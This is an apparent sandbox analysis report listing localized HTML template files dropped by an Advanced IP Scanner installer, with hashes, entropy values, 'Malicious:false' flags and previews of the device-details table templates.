                                                                                                                                                                                                  SHA-512:D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_id_id.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1148
                                                                                                                                                                                                  Entropy (8bit):4.7922327669232505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                                                                                                  MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                                                                                                  SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                                                                                                  SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                                                                                                  SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_it_it.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.78207214825378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
                                                                                                                                                                                                  MD5:470C4551612D8025E2C1FF7129C75577
                                                                                                                                                                                                  SHA1:BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
                                                                                                                                                                                                  SHA-256:8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
                                                                                                                                                                                                  SHA-512:21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_ja_jp.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1187
                                                                                                                                                                                                  Entropy (8bit):5.11658152620251
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
                                                                                                                                                                                                  MD5:7B64191A23A7F9EF19022435267FED84
                                                                                                                                                                                                  SHA1:3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
                                                                                                                                                                                                  SHA-256:58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
                                                                                                                                                                                                  SHA-512:F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_ko_kr.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1162
                                                                                                                                                                                                  Entropy (8bit):5.054590965912235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
                                                                                                                                                                                                  MD5:AAFE73E9DD742ECBA22903D3DA498688
                                                                                                                                                                                                  SHA1:AE8580EFD2267042ABB5D6EBC36A0277345BE963
                                                                                                                                                                                                  SHA-256:777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
                                                                                                                                                                                                  SHA-512:06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_lt_lt.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1169
                                                                                                                                                                                                  Entropy (8bit):4.842737243338588
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
                                                                                                                                                                                                  MD5:59A017F97EA0743C741E972819CFEA19
                                                                                                                                                                                                  SHA1:E6480E68B930A8595EACBAC255B3BFAFCC30D466
                                                                                                                                                                                                  SHA-256:71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
                                                                                                                                                                                                  SHA-512:95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_lv_lv.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                  Entropy (8bit):4.8880159035742965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                                                                                                  MD5:1588431C36A3112355553A6967E3405E
                                                                                                                                                                                                  SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                                                                                                  SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                                                                                                  SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_nb_no.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.789609676615686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
                                                                                                                                                                                                  MD5:C81043ED485CCE96CDA08A5986F04E31
                                                                                                                                                                                                  SHA1:8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
                                                                                                                                                                                                  SHA-256:119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
                                                                                                                                                                                                  SHA-512:56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_nl_nl.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                                  Entropy (8bit):4.79937338549848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
                                                                                                                                                                                                  MD5:A420CCFD66627A25731173A49B1C98E1
                                                                                                                                                                                                  SHA1:CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
                                                                                                                                                                                                  SHA-256:FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
                                                                                                                                                                                                  SHA-512:99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_pl_pl.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.85707182260681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                                                                                                  MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                                                                                                  SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                                                                                                  SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                                                                                                  SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_pt_br.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.820254321830803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
                                                                                                                                                                                                  MD5:82043E0E5311A889AD7709A4A735BC76
                                                                                                                                                                                                  SHA1:F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
                                                                                                                                                                                                  SHA-256:9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
                                                                                                                                                                                                  SHA-512:E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_ro_ro.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.803303336966706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
                                                                                                                                                                                                  MD5:27C167C1E5624DC7F4D0256ABAA8632F
                                                                                                                                                                                                  SHA1:7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
                                                                                                                                                                                                  SHA-256:E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
                                                                                                                                                                                                  SHA-512:C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_ru_ru.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                  Entropy (8bit):5.137449444677303
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
                                                                                                                                                                                                  MD5:C09C9A49D20E9E03FBA82E0247B38770
                                                                                                                                                                                                  SHA1:B95253268F788CEB0B603E194C4AB1A7451B2C44
                                                                                                                                                                                                  SHA-256:717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
                                                                                                                                                                                                  SHA-512:BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_sk_sk.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1159
                                                                                                                                                                                                  Entropy (8bit):4.88658440484172
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
                                                                                                                                                                                                  MD5:E133CA274E9A1C5B55A9AE459656E935
